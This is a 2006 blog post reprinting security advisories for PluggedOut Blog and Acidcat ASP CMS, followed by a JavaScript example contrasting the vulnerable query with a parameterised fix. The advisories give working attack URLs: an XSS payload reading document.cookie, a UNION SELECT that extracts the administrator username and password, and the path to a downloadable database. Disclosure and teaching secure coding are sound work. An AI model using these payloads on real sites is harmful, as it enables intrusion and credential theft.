Monday, July 10, 2006
PluggedOut Blog SQL INJECTION and XSS
PluggedOut Blog is an open source script you can run on your web server to give
you an online multi-user journal or diary.
It can be used equally well for any kind of calendar application. Rather than
give you a thousand things you don't really want ...
PluggedOut Blog: http://www.pluggedout.com/
Credit:
The information has been provided by Hamid Ebadi (Hamid Network Security Team):
admin@hamid.ir
The original article can be found at:
http://hamid.ir/security/
Vulnerable Systems:
PluggedOut Blog Version: 1.9.9c (2006-01-13)
Example:
The following URL can be used to trigger an SQL injection vulnerability in exec.php:
http://[PluggedOut Blog]/exec.php?action=comment_add&entryid=[SQL INJECTION]
The following URL can be used to trigger an XSS vulnerability in problem.php:
http://[PluggedOut Blog]/problem.php?id=1&data=>script<alert('Hamid Network Security Team --> http://hamid.ir');alert(document.cookie)>/script<
Acidcat ASP CMS Multiple Vulnerabilities
Acidcat CMS is a web site and simple content management system that can be administered via a web browser.
It is free for non-commercial use. Acidcat CMS is also an open source product.
The product has been found to contain multiple security vulnerabilities that allow a remote attacker to obtain the administrator username and password.
Acidcat ASP CMS: http://www.acidcat.com
Credit:
The information has been provided by Hamid Ebadi (Hamid Network Security Team): admin@hamid.ir.
The original article can be found at: http://hamid.ir/security/
Vulnerable Systems:
* Acidcat CMS v 2.1.13 and below
Example:
The following URL can be used to trigger an SQL injection vulnerability in the main_content.asp page:
http://localhost/acidcat/default.asp?ID=1'
The server responds with:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'ID = 1'''.
/main_content.asp, line 16
Vulnerable Code:
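The following line in main_content.asp doubles single quotes but concatenates the value into a numeric comparison, so input that contains no quotes reaches the query unchanged:
Item.Source = "SELECT * FROM Item WHERE ID = "+ Item__MMColParam.replace(/'/g, "''") + "";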
Exploit:
The following URL illustrates how the administrator username and password can be read from the Configuration table:
http://localhost/acidcat/default.asp?ID=26 union select 1,username,3,password,5,6 from Configuration
The base path of the login is:
http://localhost/acidcat/main_login.asp
Database Download:
In a default installation the database can be downloaded over the web. It can be found at http://localhost/acidcat/databases/acidcat.mdb
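Why the quote doubling in the main_content.asp line does not stop the injection, next to a hardened alternative. This is an added example, not code from the advisory or from Acidcat: the function names, the 32-bit ID range and the sample inputs are assumptions, and it is written in plain JavaScript (the page's line is JScript) so it runs outside ASP.

```javascript
// Added example (not Acidcat's code). Function names are hypothetical; only the
// query text is copied from the advisory's main_content.asp line.

// The advisory's pattern: double single quotes, then concatenate into a
// numeric comparison. There is no quoted string to break out of, so the
// escaping changes nothing for input that contains no quote character.
function buildQueryVulnerable(rawId) {
  return "SELECT * FROM Item WHERE ID = " + String(rawId).replace(/'/g, "''") + "";
}

// Hardened step 1: accept only a canonical positive 32-bit integer.
// (The 32-bit range is an assumption about the ID column type.)
function parseItemId(rawId) {
  if (typeof rawId !== "string" || !/^[0-9]{1,10}$/.test(rawId)) return null;
  const n = Number(rawId);
  return n >= 1 && n <= 2147483647 ? n : null;
}

// Hardened step 2: return SQL with a placeholder plus a typed parameter list,
// the shape a parameterised command expects. The value never enters the SQL text.
function buildQueryHardened(rawId) {
  const id = parseItemId(rawId);
  if (id === null) return null; // caller should answer with an error page
  return { sql: "SELECT * FROM Item WHERE ID = ?", params: [id] };
}

// Constructed inputs: a normal ID, the advisory's two request values,
// an empty value and an out-of-range number.
const samples = [
  "26",
  "1'",
  "26 union select 1,username,3,password,5,6 from Configuration",
  "",
  "99999999999",
];

// Build both forms for each input so the difference is visible side by side.
function report(inputs) {
  return inputs.map((raw) => ({
    raw,
    vulnerable: buildQueryVulnerable(raw),
    hardened: buildQueryHardened(raw),
  }));
}

console.log(JSON.stringify(report(samples), null, 2));
```

In the ASP page itself, the validated ID would be bound as a parameter of an ADODB.Command rather than concatenated into Item.Source.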